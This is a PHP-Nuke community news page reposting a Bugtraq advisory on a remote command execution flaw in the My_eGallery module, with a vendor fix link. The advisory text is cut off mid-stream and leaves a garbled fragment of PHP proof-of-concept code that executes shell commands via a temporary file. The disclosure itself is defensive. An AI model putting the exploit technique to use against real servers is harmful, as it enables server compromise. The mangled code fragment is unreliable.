You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 696 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
PHP-NukeJeruvy writes "Here is a posting on Bugtraq about the exploits that have been discussed in the forums recently here at nuke cops.
Keep in mind this individual has not been known in the past to verify his vulnerabilities, but I would recommend testing this if you are using eGallery. The author discusses its use with Postnuke, but I would confirm or deny this with PHP-Nuke.
J.

Product: My_eGallery Versions affected: all /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); print_output(); ?> This allows execution of any command on the server with My_eGallery, under the privileges of the Web server (usually apache or httpd). 3. Solution ----------- Vendor was contacted and promptly replied. Fix is available at the vendor's site: http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil e=index&req=viewdownload&cid=5 As this was seen being exploited in the wild, users are urged to upgrade to the latest version as soon as possible. Regards, Bojan Zdrnja CISSP "
Posted on Saturday, November 29 @ 14:21:07 CET by Zhen-Xjell
 
Related Links
· More about PHP-Nuke
· News by Zhen-Xjell
Most read story about PHP-Nuke:
PHP-Nuke new development direction (part 2)
Article Rating
Average Score: 0
Votes: 0

Please take a second and vote for this article:

Excellent
Very Good
Good
Regular
Bad
Options

 Printer Friendly Page  Printer Friendly Page

 Send to a Friend  Send to a Friend
Threshold
The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.078 Seconds - 276 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::